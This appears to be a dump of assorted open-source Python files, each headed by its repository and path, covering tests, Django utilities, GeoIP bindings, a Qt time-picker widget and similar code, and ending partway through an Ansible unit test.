pombredanne/tahoe-lafs
|
refs/heads/master
|
src/allmydata/test/test_ftp.py
|
6
|
from twisted.trial import unittest
from allmydata.frontends import ftpd
from allmydata.immutable import upload
from allmydata.mutable import publish
from allmydata.test.no_network import GridTestMixin
from allmydata.test.common_util import ReallyEqualMixin
class Handler(GridTestMixin, ReallyEqualMixin, unittest.TestCase):
"""
This is a no-network unit test of ftpd.Handler and the abstractions
it uses.
"""
FALL_OF_BERLIN_WALL = 626644800
TURN_OF_MILLENIUM = 946684800
def _set_up(self, basedir, num_clients=1, num_servers=10):
self.basedir = "ftp/" + basedir
self.set_up_grid(num_clients=num_clients, num_servers=num_servers)
self.client = self.g.clients[0]
self.username = "alice"
self.convergence = ""
d = self.client.create_dirnode()
def _created_root(node):
self.root = node
self.root_uri = node.get_uri()
self.handler = ftpd.Handler(self.client, self.root, self.username,
self.convergence)
d.addCallback(_created_root)
return d
def _set_metadata(self, name, metadata):
"""Set metadata for `name', avoiding MetadataSetter's timestamp reset
behavior."""
def _modifier(old_contents, servermap, first_time):
children = self.root._unpack_contents(old_contents)
children[name] = (children[name][0], metadata)
return self.root._pack_contents(children)
return self.root._node.modify(_modifier)
def _set_up_tree(self):
# add immutable file at root
immutable = upload.Data("immutable file contents", None)
d = self.root.add_file(u"immutable", immutable)
# `mtime' and `linkmotime' both set
md_both = {'mtime': self.FALL_OF_BERLIN_WALL,
'tahoe': {'linkmotime': self.TURN_OF_MILLENIUM}}
d.addCallback(lambda _: self._set_metadata(u"immutable", md_both))
# add link to root from root
d.addCallback(lambda _: self.root.set_node(u"loop", self.root))
# `mtime' set, but no `linkmotime'
md_just_mtime = {'mtime': self.FALL_OF_BERLIN_WALL, 'tahoe': {}}
d.addCallback(lambda _: self._set_metadata(u"loop", md_just_mtime))
# add mutable file at root
mutable = publish.MutableData("mutable file contents")
d.addCallback(lambda _: self.client.create_mutable_file(mutable))
d.addCallback(lambda node: self.root.set_node(u"mutable", node))
# neither `mtime' nor `linkmotime' set
d.addCallback(lambda _: self._set_metadata(u"mutable", {}))
return d
def _compareDirLists(self, actual, expected):
actual_list = sorted(actual)
expected_list = sorted(expected)
self.failUnlessReallyEqual(len(actual_list), len(expected_list),
"%r is wrong length, expecting %r" % (
actual_list, expected_list))
for (a, b) in zip(actual_list, expected_list):
(name, meta) = a
(expected_name, expected_meta) = b
self.failUnlessReallyEqual(name, expected_name)
self.failUnlessReallyEqual(meta, expected_meta)
def test_list(self):
keys = ("size", "directory", "permissions", "hardlinks", "modified",
"owner", "group", "unexpected")
d = self._set_up("list")
d.addCallback(lambda _: self._set_up_tree())
d.addCallback(lambda _: self.handler.list("", keys=keys))
expected_root = [
('loop',
[0, True, ftpd.IntishPermissions(0600), 1, self.FALL_OF_BERLIN_WALL, 'alice', 'alice', '??']),
('immutable',
[23, False, ftpd.IntishPermissions(0600), 1, self.TURN_OF_MILLENIUM, 'alice', 'alice', '??']),
('mutable',
# timestamp should be 0 if no timestamp metadata is present
[0, False, ftpd.IntishPermissions(0600), 1, 0, 'alice', 'alice', '??'])]
d.addCallback(lambda root: self._compareDirLists(root, expected_root))
return d
|
openiitbombayx/edx-platform
|
refs/heads/master
|
openedx/core/djangoapps/user_api/tests/test_middleware.py
|
152
|
"""Tests for user API middleware"""
from mock import Mock, patch
from unittest import TestCase
from django.http import HttpResponse
from django.test.client import RequestFactory
from student.tests.factories import UserFactory, AnonymousUserFactory
from ..tests.factories import UserCourseTagFactory
from ..middleware import UserTagsEventContextMiddleware
class TagsMiddlewareTest(TestCase):
"""
Test the UserTagsEventContextMiddleware
"""
def setUp(self):
super(TagsMiddlewareTest, self).setUp()
self.middleware = UserTagsEventContextMiddleware()
self.user = UserFactory.create()
self.other_user = UserFactory.create()
self.course_id = 'mock/course/id'
self.request_factory = RequestFactory()
# TODO: Make it so we can use reverse. Appears to fail depending on the order in which tests are run
#self.request = RequestFactory().get(reverse('courseware', kwargs={'course_id': self.course_id}))
self.request = RequestFactory().get('/courses/{}/courseware'.format(self.course_id))
self.request.user = self.user
self.response = Mock(spec=HttpResponse)
patcher = patch('openedx.core.djangoapps.user_api.middleware.tracker')
self.tracker = patcher.start()
self.addCleanup(patcher.stop)
def process_request(self):
"""
Execute process request using the request, and verify that it returns None
so that the request continues.
"""
# Middleware should pass request through
self.assertEquals(self.middleware.process_request(self.request), None)
def assertContextSetTo(self, context):
"""Asserts UserTagsEventContextMiddleware.CONTEXT_NAME matches ``context``"""
self.tracker.get_tracker.return_value.enter_context.assert_called_with( # pylint: disable=maybe-no-member
UserTagsEventContextMiddleware.CONTEXT_NAME,
context
)
def test_tag_context(self):
for key, value in (('int_value', 1), ('str_value', "two")):
UserCourseTagFactory.create(
course_id=self.course_id,
user=self.user,
key=key,
value=value,
)
UserCourseTagFactory.create(
course_id=self.course_id,
user=self.other_user,
key="other_user",
value="other_user_value"
)
UserCourseTagFactory.create(
course_id='other/course/id',
user=self.user,
key="other_course",
value="other_course_value"
)
self.process_request()
self.assertContextSetTo({
'course_id': self.course_id,
'course_user_tags': {
'int_value': '1',
'str_value': 'two',
}
})
def test_no_tags(self):
self.process_request()
self.assertContextSetTo({'course_id': self.course_id, 'course_user_tags': {}})
def test_not_course_url(self):
self.request = self.request_factory.get('/not/a/course/url')
self.request.user = self.user
self.process_request()
self.assertContextSetTo({})
def test_invalid_course_id(self):
self.request = self.request_factory.get('/courses/edX/101/')
self.request.user = self.user
self.process_request()
self.assertContextSetTo({})
def test_anonymous_user(self):
self.request.user = AnonymousUserFactory()
self.process_request()
self.assertContextSetTo({'course_id': self.course_id, 'course_user_tags': {}})
def test_remove_context(self):
get_tracker = self.tracker.get_tracker # pylint: disable=maybe-no-member
exit_context = get_tracker.return_value.exit_context
# The middleware should clean up the context when the request is done
self.assertEquals(
self.middleware.process_response(self.request, self.response),
self.response
)
exit_context.assert_called_with(UserTagsEventContextMiddleware.CONTEXT_NAME)
exit_context.reset_mock()
# Even if the tracker blows up, the middleware should still return the response
get_tracker.side_effect = Exception
self.assertEquals(
self.middleware.process_response(self.request, self.response),
self.response
)
|
Pulgama/supriya
|
refs/heads/master
|
supriya/osc/OscCallback.py
|
1
|
from supriya.system.SupriyaObject import SupriyaObject
class OscCallback(SupriyaObject):
"""
An OSC callback.
::
>>> import supriya.osc
>>> callback = supriya.osc.OscCallback(
... address_pattern='/*',
... procedure=lambda x: print('GOT:', x),
... )
"""
### CLASS VARIABLES ###
__slots__ = ("_address_pattern", "_argument_template", "_is_one_shot", "_procedure")
### INITIALIZER ###
def __init__(
self,
address_pattern=None,
argument_template=None,
is_one_shot=False,
procedure=None,
):
self._address_pattern = address_pattern
if argument_template is not None:
argument_template = tuple(argument_template)
self._argument_template = argument_template
self._procedure = procedure
self._is_one_shot = bool(is_one_shot)
### SPECIAL METHODS ###
def __call__(self, message):
self._procedure(message)
### PUBLIC PROPERTIES ###
@property
def address_pattern(self):
"""
The address pattern of the callback.
::
>>> callback = supriya.osc.OscCallback(
... address_pattern='/*',
... procedure=lambda x: print('GOT:', x),
... )
>>> callback.address_pattern
'/*'
Returns string.
"""
return self._address_pattern
@property
def argument_template(self):
return self._argument_template
@property
def is_one_shot(self):
"""
Is true when the callback should be unregistered after being
called.
::
>>> callback = supriya.osc.OscCallback(
... address_pattern='/*',
... procedure=lambda x: print('GOT:', x),
... )
>>> callback.is_one_shot
False
Returns boolean.
"""
return self._is_one_shot
@property
def procedure(self):
"""
Gets the procedure to be called.
Returns callable.
"""
return self._procedure
|
IgorGolubenkov/sample-code
|
refs/heads/master
|
sample-code/examples/python/android_sauce.py
|
33
|
from appium import webdriver
from appium import SauceTestCase, on_platforms
app = "http://appium.s3.amazonaws.com/NotesList.apk"
platforms = [{
"platformName": "Android",
"platformVersion": "4.4",
"deviceName": "Android Emulator",
"appPackage": "com.example.android.notepad",
"appActivity": ".NotesList",
"app": app,
"appiumVersion": "1.3.4"
}]
@on_platforms(platforms)
class SimpleAndroidSauceTests(SauceTestCase):
def test_create_note(self):
el = self.driver.find_element_by_accessibility_id("New note")
el.click()
el = self.driver.find_element_by_class_name("android.widget.EditText")
el.send_keys("This is a new note!")
el = self.driver.find_element_by_accessibility_id("Save")
el.click()
els = self.driver.find_elements_by_class_name("android.widget.TextView")
self.assertEqual(els[2].text, "This is a new note!")
els[2].click()
|
retomerz/intellij-community
|
refs/heads/master
|
python/lib/Lib/site-packages/django/contrib/localflavor/jp/jp_prefectures.py
|
543
|
from django.utils.translation import ugettext_lazy
JP_PREFECTURES = (
('hokkaido', ugettext_lazy('Hokkaido'),),
('aomori', ugettext_lazy('Aomori'),),
('iwate', ugettext_lazy('Iwate'),),
('miyagi', ugettext_lazy('Miyagi'),),
('akita', ugettext_lazy('Akita'),),
('yamagata', ugettext_lazy('Yamagata'),),
('fukushima', ugettext_lazy('Fukushima'),),
('ibaraki', ugettext_lazy('Ibaraki'),),
('tochigi', ugettext_lazy('Tochigi'),),
('gunma', ugettext_lazy('Gunma'),),
('saitama', ugettext_lazy('Saitama'),),
('chiba', ugettext_lazy('Chiba'),),
('tokyo', ugettext_lazy('Tokyo'),),
('kanagawa', ugettext_lazy('Kanagawa'),),
('yamanashi', ugettext_lazy('Yamanashi'),),
('nagano', ugettext_lazy('Nagano'),),
('niigata', ugettext_lazy('Niigata'),),
('toyama', ugettext_lazy('Toyama'),),
('ishikawa', ugettext_lazy('Ishikawa'),),
('fukui', ugettext_lazy('Fukui'),),
('gifu', ugettext_lazy('Gifu'),),
('shizuoka', ugettext_lazy('Shizuoka'),),
('aichi', ugettext_lazy('Aichi'),),
('mie', ugettext_lazy('Mie'),),
('shiga', ugettext_lazy('Shiga'),),
('kyoto', ugettext_lazy('Kyoto'),),
('osaka', ugettext_lazy('Osaka'),),
('hyogo', ugettext_lazy('Hyogo'),),
('nara', ugettext_lazy('Nara'),),
('wakayama', ugettext_lazy('Wakayama'),),
('tottori', ugettext_lazy('Tottori'),),
('shimane', ugettext_lazy('Shimane'),),
('okayama', ugettext_lazy('Okayama'),),
('hiroshima', ugettext_lazy('Hiroshima'),),
('yamaguchi', ugettext_lazy('Yamaguchi'),),
('tokushima', ugettext_lazy('Tokushima'),),
('kagawa', ugettext_lazy('Kagawa'),),
('ehime', ugettext_lazy('Ehime'),),
('kochi', ugettext_lazy('Kochi'),),
('fukuoka', ugettext_lazy('Fukuoka'),),
('saga', ugettext_lazy('Saga'),),
('nagasaki', ugettext_lazy('Nagasaki'),),
('kumamoto', ugettext_lazy('Kumamoto'),),
('oita', ugettext_lazy('Oita'),),
('miyazaki', ugettext_lazy('Miyazaki'),),
('kagoshima', ugettext_lazy('Kagoshima'),),
('okinawa', ugettext_lazy('Okinawa'),),
)
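# Usage sketch: the tuple doubles as Django form choices and as a lookup
# table (labels resolve lazily at render time):
#
#     from django import forms
#     prefecture = forms.ChoiceField(choices=JP_PREFECTURES)
#     dict(JP_PREFECTURES)['tokyo']   # lazy u'Tokyo'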
|
OCForks/phantomjs
|
refs/heads/master
|
src/breakpad/src/third_party/protobuf/protobuf/python/google/protobuf/internal/message_listener.py
|
590
|
# Protocol Buffers - Google's data interchange format
# Copyright 2008 Google Inc. All rights reserved.
# http://code.google.com/p/protobuf/
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Defines a listener interface for observing certain
state transitions on Message objects.
Also defines a null implementation of this interface.
"""
__author__ = 'robinson@google.com (Will Robinson)'
class MessageListener(object):
"""Listens for modifications made to a message. Meant to be registered via
Message._SetListener().
Attributes:
dirty: If True, then calling Modified() would be a no-op. This can be
used to avoid these calls entirely in the common case.
"""
def Modified(self):
"""Called every time the message is modified in such a way that the parent
message may need to be updated. This currently means either:
(a) The message was modified for the first time, so the parent message
should henceforth mark the message as present.
(b) The message's cached byte size became dirty -- i.e. the message was
modified for the first time after a previous call to ByteSize().
Therefore the parent should also mark its byte size as dirty.
    Note that (a) implies (b), since new objects start out with a clean cached
size (zero). However, we document (a) explicitly because it is important.
Modified() will *only* be called in response to one of these two events --
not every time the sub-message is modified.
Note that if the listener's |dirty| attribute is true, then calling
Modified at the moment would be a no-op, so it can be skipped. Performance-
sensitive callers should check this attribute directly before calling since
it will be true most of the time.
"""
raise NotImplementedError
class NullMessageListener(object):
"""No-op MessageListener implementation."""
def Modified(self):
pass
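# --- Illustrative sketch (not part of the original module) ---
# A minimal concrete MessageListener, assuming a hypothetical parent object
# exposing a `_MarkDirty()` hook; all names below are illustrative only.
#
#   class ParentTrackingListener(object):
#       def __init__(self, parent):
#           self._parent = parent
#           self.dirty = False
#       def Modified(self):
#           if self.dirty:
#               return  # Already reported; per the interface, a no-op.
#           self.dirty = True
#           self._parent._MarkDirty()  # Hypothetical parent hook.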
|
pattisdr/osf.io
|
refs/heads/develop
|
osf/management/commands/confirm_spam.py
|
5
|
"""Mark specified nodes as spam.
python manage.py confirm_spam abc12
"""
import logging
from django.core.management.base import BaseCommand
from osf.models import Guid, Preprint
logger = logging.getLogger(__name__)
def confirm_spam(guid):
node = guid.referent
referent_type = 'preprint' if isinstance(node, Preprint) else 'node'
logger.info('Marking {} {} as spam...'.format(referent_type, node._id))
saved_fields = {'is_public', } if referent_type == 'node' else {'is_published', }
content = node._get_spam_content(saved_fields | node.SPAM_CHECK_FIELDS)[:300]
# spam_data must be populated in order for confirm_spam to work
node.spam_data['headers'] = {
'Remote-Addr': '',
'User-Agent': '',
'Referer': '',
}
node.spam_data['content'] = content
node.spam_data['author'] = node.creator.fullname
node.spam_data['author_email'] = node.creator.username
node.confirm_spam()
node.save()
class Command(BaseCommand):
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument('guids', type=str, nargs='+', help='List of Node or Preprint GUIDs')
def handle(self, *args, **options):
guids = options.get('guids', [])
for guid in Guid.objects.filter(_id__in=guids):
confirm_spam(guid)
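# Usage sketch (the GUIDs below are placeholders):
#   python manage.py confirm_spam abc12 def34
# GUIDs are resolved with Guid.objects.filter(_id__in=guids), so unrecognized
# GUIDs are silently skipped rather than raising an error.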
|
nerdvegas/rez
|
refs/heads/master
|
src/rezgui/widgets/TimeSelecterPopup.py
|
1
|
from Qt import QtCore, QtWidgets, QtGui
from rezgui.util import update_font, create_pane
from rez.utils.formatting import readable_time_duration
import math
class Canvas(QtWidgets.QWidget):
secondsHover = QtCore.Signal(int)
secondsClicked = QtCore.Signal(int)
def __init__(self, width, height, parent=None):
super(Canvas, self).__init__(parent)
self.setCursor(QtCore.Qt.CrossCursor)
self.setMouseTracking(True)
self._width = width
self._height = height
def paintEvent(self, event):
rect = self.rect()
w = rect.width()
h = rect.height()
margin = 5
        j = h // 4  # integer row height; drawLine expects ints under Python 3
p = QtGui.QPainter(self)
update_font(p, italic=True)
pal = QtGui.QPalette()
bg_brush = pal.brush(QtGui.QPalette.Active, QtGui.QPalette.Light)
p.fillRect(rect, bg_brush)
p.setPen(QtCore.Qt.DotLine)
p.drawLine(0, j, w, j)
p.drawLine(0, j * 2, w, j * 2)
p.drawLine(0, j * 3, w, j * 3)
p.setPen(pal.color(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText))
p.drawText(margin, j - margin, "days")
p.drawText(margin, j * 2 - margin, "hours")
p.drawText(margin, j * 3 - margin, "minutes")
p.drawText(margin, j * 4 - margin, "seconds")
def leaveEvent(self, event):
self.secondsHover.emit(-1)
def mousePressEvent(self, event):
secs = self._get_seconds(event.pos())
self.secondsClicked.emit(secs)
def mouseMoveEvent(self, event):
secs = self._get_seconds(event.pos())
self.secondsHover.emit(secs)
def sizeHint(self):
return QtCore.QSize(self._width, self._height)
def _get_seconds(self, pos):
rect = self.rect()
x_norm = pos.x() / float(rect.width())
y_norm = min(1.0 - (pos.y() / float(rect.height())), 0.99)
unit = int(y_norm / 0.25)
y_norm -= unit * 0.25
y_norm *= 4.0
x_norm = max(min(x_norm, 0.99), 0.0)
y_norm = max(min(y_norm, 0.99), 0.0)
j = 2.5 * (1.0 - y_norm)
x_pow = 0.5 + (j * j / 2.5)
f = math.pow(x_norm, x_pow)
if unit == 0: # seconds
j = int(1.0 + f * 59)
secs = min(j, 59)
elif unit == 1: # minutes
j = int((1.0 + f * 60) * 60)
secs = min(j, 3600)
elif unit == 2: # hours
j = int((1.0 + f * 24) * 3600)
secs = min(j, 3600 * 24)
else: # days
j = int((1.0 + f * 7) * 3600 * 24)
secs = min(j, 3600 * 24 * 7)
return secs
class TimeSelecterPopup(QtWidgets.QFrame):
secondsClicked = QtCore.Signal(int)
def __init__(self, pivot_widget, width=240, height=160, parent=None):
super(TimeSelecterPopup, self).__init__(parent)
self.setFrameStyle(QtWidgets.QFrame.Panel | QtWidgets.QFrame.Raised)
self.setWindowFlags(QtCore.Qt.Popup)
self.seconds = None
self.label = QtWidgets.QLabel("")
canvas_frame = QtWidgets.QFrame()
canvas_frame.setFrameStyle(QtWidgets.QFrame.Panel | QtWidgets.QFrame.Sunken)
canvas = Canvas(width, height)
layout = QtWidgets.QVBoxLayout()
layout.setSpacing(2)
layout.setContentsMargins(2, 2, 2, 2)
layout.addWidget(canvas)
canvas_frame.setLayout(layout)
create_pane([self.label, canvas_frame], False, compact=True,
parent_widget=self)
self.adjustSize()
pt = pivot_widget.rect().topLeft()
global_pt = pivot_widget.mapToGlobal(pt)
self.move(global_pt - QtCore.QPoint(0, self.height()))
canvas.secondsHover.connect(self._secondsHover)
canvas.secondsClicked.connect(self._secondsClicked)
def _secondsHover(self, seconds):
if seconds == -1:
self.label.setText("")
else:
secs_txt = readable_time_duration(seconds)
self.label.setText("%s ago" % secs_txt)
def _secondsClicked(self, seconds):
self.secondsClicked.emit(seconds)
self.close()
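# Illustrative usage sketch (assumes a running Qt application; `button` is a
# hypothetical widget used to anchor the popup):
#
#   popup = TimeSelecterPopup(button, parent=button)
#   popup.secondsClicked.connect(lambda secs: print("%d seconds ago" % secs))
#   popup.show()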
# Copyright 2013-2016 Allan Johns.
#
# This library is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library. If not, see <http://www.gnu.org/licenses/>.
|
oberlin/django
|
refs/heads/master
|
django/core/serializers/pyyaml.py
|
439
|
"""
YAML serializer.
Requires PyYaml (http://pyyaml.org/), but that's checked for in __init__.
"""
import collections
import decimal
import sys
from io import StringIO
import yaml
from django.core.serializers.base import DeserializationError
from django.core.serializers.python import (
Deserializer as PythonDeserializer, Serializer as PythonSerializer,
)
from django.db import models
from django.utils import six
# Use the C (faster) implementation if possible
try:
from yaml import CSafeLoader as SafeLoader
from yaml import CSafeDumper as SafeDumper
except ImportError:
from yaml import SafeLoader, SafeDumper
class DjangoSafeDumper(SafeDumper):
def represent_decimal(self, data):
return self.represent_scalar('tag:yaml.org,2002:str', str(data))
def represent_ordered_dict(self, data):
return self.represent_mapping('tag:yaml.org,2002:map', data.items())
DjangoSafeDumper.add_representer(decimal.Decimal, DjangoSafeDumper.represent_decimal)
DjangoSafeDumper.add_representer(collections.OrderedDict, DjangoSafeDumper.represent_ordered_dict)
class Serializer(PythonSerializer):
"""
Convert a queryset to YAML.
"""
internal_use_only = False
def handle_field(self, obj, field):
# A nasty special case: base YAML doesn't support serialization of time
# types (as opposed to dates or datetimes, which it does support). Since
# we want to use the "safe" serializer for better interoperability, we
# need to do something with those pesky times. Converting 'em to strings
# isn't perfect, but it's better than a "!!python/time" type which would
# halt deserialization under any other language.
if isinstance(field, models.TimeField) and getattr(obj, field.name) is not None:
self._current[field.name] = str(getattr(obj, field.name))
else:
super(Serializer, self).handle_field(obj, field)
def end_serialization(self):
yaml.dump(self.objects, self.stream, Dumper=DjangoSafeDumper, **self.options)
def getvalue(self):
# Grand-parent super
return super(PythonSerializer, self).getvalue()
def Deserializer(stream_or_string, **options):
"""
Deserialize a stream or string of YAML data.
"""
if isinstance(stream_or_string, bytes):
stream_or_string = stream_or_string.decode('utf-8')
if isinstance(stream_or_string, six.string_types):
stream = StringIO(stream_or_string)
else:
stream = stream_or_string
try:
for obj in PythonDeserializer(yaml.load(stream, Loader=SafeLoader), **options):
yield obj
except GeneratorExit:
raise
except Exception as e:
# Map to deserializer error
six.reraise(DeserializationError, DeserializationError(e), sys.exc_info()[2])
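# Illustrative usage sketch via the standard serializer registry (SomeModel
# is a placeholder):
#
#   from django.core import serializers
#   data = serializers.serialize('yaml', SomeModel.objects.all())
#   objects = list(serializers.deserialize('yaml', data))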
|
pklimai/py-junos-eznc
|
refs/heads/master
|
lib/jnpr/junos/resources/syslog.py
|
3
|
"""
Pythonifier for Syslog Table/View
"""
from jnpr.junos.factory import loadyaml
from os.path import splitext
_YAML_ = splitext(__file__)[0] + '.yml'
globals().update(loadyaml(_YAML_))
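# Note (sketch): loadyaml() reads the syslog.yml file that sits next to this
# module and returns the Table/View classes defined there; the
# globals().update() call above then exposes them as module attributes
# (e.g. a hypothetical SyslogTable importable from this module).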
|
ProfessionalIT/professionalit-webiste
|
refs/heads/master
|
sdk/google_appengine/lib/django-1.4/django/contrib/gis/geoip/prototypes.py
|
200
|
from ctypes import c_char_p, c_float, c_int, string_at, Structure, POINTER
from django.contrib.gis.geoip.libgeoip import lgeoip, free
#### GeoIP C Structure definitions ####
class GeoIPRecord(Structure):
_fields_ = [('country_code', c_char_p),
('country_code3', c_char_p),
('country_name', c_char_p),
('region', c_char_p),
('city', c_char_p),
('postal_code', c_char_p),
('latitude', c_float),
('longitude', c_float),
                # TODO: In 1.4.6 this changed from `int dma_code;` to
                # `union {int metro_code; int dma_code;};`. Change
                # to a `ctypes.Union` to accommodate this in the future,
                # when pre-1.4.6 versions are no longer distributed.
('dma_code', c_int),
('area_code', c_int),
('charset', c_int),
('continent_code', c_char_p),
]
geoip_char_fields = [name for name, ctype in GeoIPRecord._fields_ if ctype is c_char_p]
geoip_encodings = { 0: 'iso-8859-1',
1: 'utf8',
}
class GeoIPTag(Structure): pass
RECTYPE = POINTER(GeoIPRecord)
DBTYPE = POINTER(GeoIPTag)
#### ctypes function prototypes ####
# GeoIP_lib_version appeared in version 1.4.7.
if hasattr(lgeoip, 'GeoIP_lib_version'):
GeoIP_lib_version = lgeoip.GeoIP_lib_version
GeoIP_lib_version.argtypes = None
GeoIP_lib_version.restype = c_char_p
else:
GeoIP_lib_version = None
# For freeing memory allocated within a record
GeoIPRecord_delete = lgeoip.GeoIPRecord_delete
GeoIPRecord_delete.argtypes = [RECTYPE]
GeoIPRecord_delete.restype = None
# For retrieving records by name or address.
def check_record(result, func, cargs):
if bool(result):
        # Check the pointer to the C structure; if valid, pull the elements
        # out into a dictionary.
rec = result.contents
record = dict((fld, getattr(rec, fld)) for fld, ctype in rec._fields_)
# Now converting the strings to unicode using the proper encoding.
encoding = geoip_encodings[record['charset']]
for char_field in geoip_char_fields:
if record[char_field]:
record[char_field] = record[char_field].decode(encoding)
# Free the memory allocated for the struct & return.
GeoIPRecord_delete(result)
return record
else:
return None
def record_output(func):
func.argtypes = [DBTYPE, c_char_p]
func.restype = RECTYPE
func.errcheck = check_record
return func
GeoIP_record_by_addr = record_output(lgeoip.GeoIP_record_by_addr)
GeoIP_record_by_name = record_output(lgeoip.GeoIP_record_by_name)
# For opening & closing GeoIP database files.
GeoIP_open = lgeoip.GeoIP_open
GeoIP_open.restype = DBTYPE
GeoIP_delete = lgeoip.GeoIP_delete
GeoIP_delete.argtypes = [DBTYPE]
GeoIP_delete.restype = None
# This is so the string pointer can be freed within Python.
class geoip_char_p(c_char_p):
pass
def check_string(result, func, cargs):
if result:
s = string_at(result)
free(result)
else:
s = ''
return s
GeoIP_database_info = lgeoip.GeoIP_database_info
GeoIP_database_info.restype = geoip_char_p
GeoIP_database_info.errcheck = check_string
# String output routines.
def string_output(func):
func.restype = c_char_p
return func
GeoIP_country_code_by_addr = string_output(lgeoip.GeoIP_country_code_by_addr)
GeoIP_country_code_by_name = string_output(lgeoip.GeoIP_country_code_by_name)
GeoIP_country_name_by_addr = string_output(lgeoip.GeoIP_country_name_by_addr)
GeoIP_country_name_by_name = string_output(lgeoip.GeoIP_country_name_by_name)
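# Illustrative sketch (not part of the original module; the database path and
# flag value are assumptions):
#
#   db = GeoIP_open(b'/path/to/GeoLiteCity.dat', 0)  # 0 ~ GEOIP_STANDARD
#   record = GeoIP_record_by_name(db, b'example.com')  # dict or None
#   GeoIP_delete(db)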
|
sassoftware/mint
|
refs/heads/master
|
mint_test/resttest/apitest/modulehookstest.py
|
1
|
#!/usr/bin/python
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
import re
import time
from conary import conaryclient
from conary import constants as conaryConstants
from conary.lib import util
from mint import buildtypes
from mint import constants
from rpath_proddef import api1 as proddef
import restbase
from restlib import client as restClient
ResponseError = restClient.ResponseError
class ModuleHooksTest(restbase.BaseRestTest):
def setUp(self):
restbase.BaseRestTest.setUp(self)
        self.f1 = open('%s/test1.swf' % self.tmpDir, 'w')
        self.f2 = open('%s/test2.swf' % self.tmpDir, 'w')
    def tearDown(self):
        # Close the handles before removing the files.
        self.f1.close()
        self.f2.close()
        os.remove(self.f1.name)
        os.remove(self.f2.name)
def testGetInfo(self):
uriTemplate = '/moduleHooks'
uri = uriTemplate
client = self.getRestClient()
self.mintCfg.moduleHooksDir = self.tmpDir
response = client.call('GET', uri, convert=False)[1]
self.failUnlessEqual(len(response.moduleHooks), 2)
|
bowlofstew/Impala
|
refs/heads/cdh5-trunk
|
tests/__init__.py
|
186
|
# This file is needed to make the files in this directory a python module
|
funkring/fdoo
|
refs/heads/8.0-fdoo
|
addons/base_report_designer/__init__.py
|
421
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import wizard
import base_report_designer
import installer
import openerp_sxw2rml
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
Qalthos/ansible
|
refs/heads/devel
|
test/units/utils/test_context_objects.py
|
29
|
# -*- coding: utf-8 -*-
# Copyright: (c) 2018, Toshio Kuratomi <tkuratomi@ansible.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division)
__metaclass__ = type
try:
import argparse
except ImportError:
argparse = None
import optparse
import pytest
from ansible.module_utils.common.collections import ImmutableDict
from ansible.utils import context_objects as co
MAKE_IMMUTABLE_DATA = ((u'くらとみ', u'くらとみ'),
(42, 42),
({u'café': u'くらとみ'}, ImmutableDict({u'café': u'くらとみ'})),
([1, u'café', u'くらとみ'], (1, u'café', u'くらとみ')),
(set((1, u'café', u'くらとみ')), frozenset((1, u'café', u'くらとみ'))),
({u'café': [1, set(u'ñ')]},
ImmutableDict({u'café': (1, frozenset(u'ñ'))})),
([set((1, 2)), {u'くらとみ': 3}],
(frozenset((1, 2)), ImmutableDict({u'くらとみ': 3}))),
)
@pytest.mark.parametrize('data, expected', MAKE_IMMUTABLE_DATA)
def test_make_immutable(data, expected):
assert co._make_immutable(data) == expected
def test_cliargs_from_dict():
old_dict = {'tags': [u'production', u'webservers'],
'check_mode': True,
'start_at_task': u'Start with くらとみ'}
expected = frozenset((('tags', (u'production', u'webservers')),
('check_mode', True),
